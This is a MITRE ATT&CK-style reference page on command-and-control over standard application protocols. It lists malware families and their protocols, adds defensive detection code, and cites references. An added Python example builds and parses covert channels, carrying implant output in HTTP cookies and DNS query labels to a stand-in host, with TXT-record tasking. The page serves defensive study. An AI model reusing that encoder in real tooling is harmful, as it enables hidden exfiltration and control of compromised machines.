Standard Application Layer Protocol

Technique
ID T1071
Tactic Command and Control
Platform Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X
Data Sources Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring
Requires Network Yes

Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.
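As an added example (not code from the ATT&CK page or from any of the malware families listed below), the following Python shows the mechanics the paragraph describes: an implant's output carried in an HTTP Cookie header, and output chunked into DNS query labels with tasking returned in a TXT record. The cookie names, request path, zone name and JSON tasking format are assumptions for illustration; the 63-octet label and 253-character name limits are from RFC 1035.

```python
# Added example, not from the ATT&CK page or from any malware named on it.
# Shows the mechanics of the technique: C2 data riding inside ordinary-looking
# HTTP and DNS fields. Field names, path, zone and tasking format are assumptions.
import base64
import json

# --- HTTP: implant output carried in a Cookie header ---

def build_http_beacon(host: str, session_id: str, result: bytes) -> bytes:
    """Raw HTTP/1.1 GET whose Cookie header carries the implant's output.
    In flow logs this is one small GET to a web host on port 80/443."""
    blob = base64.b64encode(result).decode()
    request = (
        "GET /images/logo.png HTTP/1.1\r\n"           # path is an assumption
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        f"Cookie: sid={session_id}; data={blob}\r\n"  # cookie names are assumptions
        "Connection: close\r\n\r\n"
    )
    return request.encode()


def parse_cookie_beacon(raw: bytes) -> dict:
    """Controller side: recover the embedded fields from the Cookie header."""
    cookie_line = next(h for h in raw.decode().split("\r\n")
                       if h.lower().startswith("cookie:"))
    fields = {}
    for part in cookie_line.split(":", 1)[1].split(";"):
        name, _, value = part.strip().partition("=")
        fields[name] = value
    return {"sid": fields["sid"], "data": base64.b64decode(fields["data"])}


# --- DNS: output chunked into query labels, tasking returned in TXT answers ---
MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a name in text form is at most 253 characters

def build_dns_query_names(payload: bytes, zone: str) -> list[str]:
    """Split payload across as many query names as needed so that every label
    and every full name stays within the DNS limits. Base32 is used because
    DNS names are case-insensitive, so base64 would not survive a resolver."""
    text = base64.b32encode(payload).decode().rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    names, current = [], []
    for label in labels:
        candidate = ".".join(current + [label]) + "." + zone
        if current and len(candidate) > MAX_NAME:
            names.append(".".join(current) + "." + zone)   # flush a full name
            current = []
        current.append(label)
    if current:
        names.append(".".join(current) + "." + zone)
    return names


def decode_dns_query_names(names: list[str], zone: str) -> bytes:
    """Controller side: strip the zone, drop the dots, re-pad and decode.
    Names are assumed to arrive in the order they were sent."""
    text = "".join(n[:-len(zone) - 1].replace(".", "") for n in names).upper()
    text += "=" * (-len(text) % 8)
    return base64.b32decode(text)


def build_txt_tasking(command: str) -> str:
    """What the controller returns in the TXT record: base64 JSON (assumption)."""
    return base64.b64encode(json.dumps({"cmd": command}).encode()).decode()


def parse_txt_tasking(txt: str) -> str:
    return json.loads(base64.b64decode(txt))["cmd"]


if __name__ == "__main__":
    req = build_http_beacon("cdn.example.com", "a1b2c3", b"hostname\nWS-042")
    print(req.decode())
    print(parse_cookie_beacon(req))
    names = build_dns_query_names(b"C:\\Users\\alice\\Desktop\\report.docx", "cdn.example.com")
    print(names)
    print(decode_dns_query_names(names, "cdn.example.com"))
    print(parse_txt_tasking(build_txt_tasking("dir %USERPROFILE%")))
```

The HTTP request is a syntactically valid GET, which is exactly why it passes a port- or protocol-based filter; only the unusually long cookie value gives it away. The DNS variant leaves the observables the Detection section relies on: long, high-entropy labels and many unique subdomains under one zone, with most of the bytes flowing from client to server.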

Examples

  • APT28 used SMTP as a communication channel in various implants, initially using self-registered Google Mail accounts and later compromised email servers of its victims. Later implants such as CHOPSTICK use a blend of HTTP and other legitimate channels, depending on module configuration.1
  • FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.2
  • A Gamaredon Group file stealer can communicate over HTTP for C2.3
  • Stealth Falcon malware communicates with its C2 server via HTTPS.4
  • 3PARA RAT uses HTTP for command and control.5
  • 4H RAT uses HTTP for command and control.5
  • ADVSTORESHELL connects to port 80 of a C2 server using Wininet API.6
  • BACKSPACE uses HTTP as a transport to communicate with its command server.7
  • BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.8
  • BUBBLEWRAP can communicate using HTTP or HTTPS.9
  • BlackEnergy communicates with its C2 server over HTTP.10
  • Various implementations of CHOPSTICK communicate with C2 over HTTP, SMTP, and POP3.11
  • CORESHELL can communicate over HTTP, SMTP, and POP3 for C2.1 12
  • The Carbanak malware communicates to its command server using HTTP with an encrypted payload.13
  • ChChes communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.14 15
  • One variant of CloudDuke uses HTTP and HTTPS for C2.16
  • Cobalt Strike uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.17
  • ComRAT has used HTTP requests for command and control.18
  • CosmicDuke can use HTTP or HTTPS for command and control to hard-coded C2 servers.16 19
  • CozyCar's main method of communicating with its C2 servers is using HTTP or HTTPS.20
  • Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.21
  • DustySky has used both HTTP and HTTPS for C2.22
  • ELMER uses HTTP for command and control.23
  • Elise communicates over HTTP or HTTPS for C2.24
  • Emissary uses HTTP or HTTPS for C2.25
  • Epic implements a command and control protocol over HTTP.26
  • Some variants of FakeM use SSL to communicate with C2 servers.27
  • GeminiDuke uses HTTP and HTTPS for command and control.16
  • The "Uploader" variant of HAMMERTOSS visits a hard-coded server over HTTP/S to download the images HAMMERTOSS uses to receive commands.28
  • HTTPBrowser has used HTTP, HTTPS, and DNS for command and control.29 30
  • Hi-Zor communicates with its C2 server over HTTPS.31
  • JHUHUGIT communicates with its C2 server over HTTP.32
  • The Komplex C2 channel uses HTTP POST requests.33
  • LOWBALL command and control occurs via HTTPS over port 443.9
  • MiniDuke uses HTTP and HTTPS for command and control.16
  • Mis-Type network traffic can communicate over HTTP.34
  • NETEAGLE will attempt to detect whether the infected host is configured to use a proxy. If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000. NETEAGLE will also use HTTP to download resources that contain an IP address and port number pair to connect to for further C2. Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519.7
  • OLDBAIT can use HTTP or SMTP for C2.1
  • OnionDuke uses HTTP and HTTPS for C2.16
  • OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.30
  • POWERSOURCE uses DNS TXT records for C2.35 36
  • PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.16
  • Pisloader uses DNS as its C2 protocol.37
  • PlugX can be configured to use HTTP or DNS for command and control.30
  • Psylo uses HTTPS for C2.27
  • Pteranodon can use HTTP for C2.3
  • RARSTONE uses SSL to encrypt its communication with its C2 server.38
  • APT12 has used RIPTIDE, a RAT that uses HTTP to communicate.39
  • RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.40
  • The Regin malware platform supports many standard protocols, including HTTP, HTTPS, and SMB.41

Mitigation

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way to avoid detection by common defensive tools.42

Detection

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.42
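The three checks in the paragraph above, as an added example that is not from the ATT&CK page: Python applied to a constructed sample of flow records (each with the first payload bytes the client sent) and to constructed host process-network events. The record layout, the 10:1 byte ratio, the 1 MB floor and the process baseline are assumptions to be tuned for a given environment.

```python
# Added example, not from the ATT&CK page. Applies the Detection paragraph's
# three checks to constructed sample data. Record layouts, thresholds and the
# process baseline are assumptions to be tuned per environment.

# Constructed flow records: (src, dst, dst_port, bytes_out, bytes_in, first_payload_bytes)
SAMPLE_FLOWS = [
    ("10.0.0.5", "93.184.216.34", 80, 512, 48_000,
     b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"),
    ("10.0.0.5", "198.51.100.7", 443, 1_200, 55_000,
     b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"),          # TLS ClientHello
    # Upload-heavy and on 443 without a TLS handshake: exfil-shaped custom protocol
    ("10.0.0.9", "203.0.113.21", 443, 9_800_000, 3_100,
     b"\x00\x00\x17\x4b\x1c\xa9\xff\x3a\x91\x02\x7e\x0c"),
    # Port 80, but the first bytes are not an HTTP request line
    ("10.0.0.9", "203.0.113.22", 80, 2_400, 2_200,
     b"\x17\x03\x03\x00\x45\x8a\x11\x02\xde\xad\xbe\xef"),
    ("10.0.0.12", "192.0.2.53", 53, 90, 400,
     b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"),       # DNS query header
]

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                b"OPTIONS ", b"CONNECT ", b"PATCH ")

def looks_like_http(p: bytes) -> bool:
    return p.startswith(HTTP_METHODS)

def looks_like_tls_client_hello(p: bytes) -> bool:
    # TLS record: content type 0x16 (handshake), version 0x03 0x00-0x04,
    # 2-byte length, then handshake type 0x01 (ClientHello).
    return (len(p) >= 6 and p[0] == 0x16 and p[1] == 0x03
            and p[2] <= 0x04 and p[5] == 0x01)

def looks_like_dns_query(p: bytes) -> bool:
    # 12-byte header; QR bit (top bit of byte 2) clear for a query; QDCOUNT >= 1.
    return len(p) >= 12 and (p[2] & 0x80) == 0 and int.from_bytes(p[4:6], "big") >= 1

EXPECTED_BY_PORT = {80: looks_like_http, 443: looks_like_tls_client_hello,
                    53: looks_like_dns_query}

def protocol_mismatch(port: int, payload: bytes) -> bool:
    """True when the port has a known protocol and the first bytes don't fit it."""
    check = EXPECTED_BY_PORT.get(port)
    return check is not None and not check(payload)

def upload_heavy(bytes_out: int, bytes_in: int,
                 ratio: float = 10.0, min_out: int = 1_000_000) -> bool:
    """Client sends at least `ratio` times what it receives, above a size floor
    so that tiny beacons and keep-alives do not trip the check."""
    return bytes_out >= min_out and bytes_out / max(bytes_in, 1) >= ratio

def analyze_flows(flows) -> list[dict]:
    findings = []
    for src, dst, port, out_b, in_b, payload in flows:
        reasons = []
        if upload_heavy(out_b, in_b):
            reasons.append("upload-heavy")
        if protocol_mismatch(port, payload):
            reasons.append(f"payload does not match expected protocol for port {port}")
        if reasons:
            findings.append({"src": src, "dst": dst, "port": port, "reasons": reasons})
    return findings

# Constructed host telemetry: (host, process, dst, dst_port). The baseline is the
# set of processes seen using the network during a learning period (assumption).
BASELINE_NETWORK_PROCESSES = {"chrome.exe", "outlook.exe", "svchost.exe"}
SAMPLE_PROCESS_EVENTS = [
    ("host-a", "chrome.exe", "93.184.216.34", 443),
    ("host-b", "notepad.exe", "203.0.113.21", 443),
    ("host-b", "wscript.exe", "203.0.113.22", 80),
]

def unbaselined_network_processes(events, baseline=BASELINE_NETWORK_PROCESSES):
    """Processes talking to the network that have no history of doing so."""
    return [e for e in events if e[1] not in baseline]

if __name__ == "__main__":
    for f in analyze_flows(SAMPLE_FLOWS):
        print(f)
    for e in unbaselined_network_processes(SAMPLE_PROCESS_EVENTS):
        print("new network process:", e)
```

The protocol checks only inspect the first bytes of the client's side of a flow, so they catch a custom protocol dropped onto a well-known port but not a well-formed HTTP or TLS session that merely carries C2 inside it; that case is what the upload-ratio and process-baseline checks, and the signature-based detection under Mitigation, are for.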

References

  1. FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
  2. FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.
  3. Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.
  4. Marczak, B. and Scott-Railton, J. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.
  5. Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016.
  6. Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
  7. FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.
  8. Lee, B. and Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.
  9. FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.
  10. F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
  11. ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.
  12. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.
  13. Kaspersky Lab's Global Research and Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. Retrieved March 3, 2015.
  14. Miller-Osborn, J. and Grunzweig, J. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
  15. Nakamura, Y. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
  16. F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
  17. Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.
  18. Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.
  19. F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.
  20. F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.
  21. Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.
  22. ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
  23. Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.
  24. Falcone, R., et al. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.
  25. Falcone, R. and Miller-Osborn, J. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.
  26. Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.
  27. Falcone, R. and Miller-Osborn, J. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.
  28. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.
  29. Shelmire, A. (2015, July 6). Evasive Maneuvers. Retrieved January 22, 2016.
  30. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved January 25, 2016.
  31. Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.
  32. ESET. (2016, October). En Route with Sednit - Part 1: Approaching the Target. Retrieved November 8, 2016.
  33. Creus, D., Halfpop, T. and Falcone, R. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
  34. Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.
  35. Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
  36. Brumaghin, E. and Grady, C. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.
  37. Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.
  38. Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.
  39. Moran, N., Oppenheim, M., Engle, S. and Wartell, R. (2014, September 3). Darwin’s Favorite APT Group [Blog]. Retrieved November 12, 2014.
  40. FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
  41. Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.
  42. Gardiner, J., Cova, M. and Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.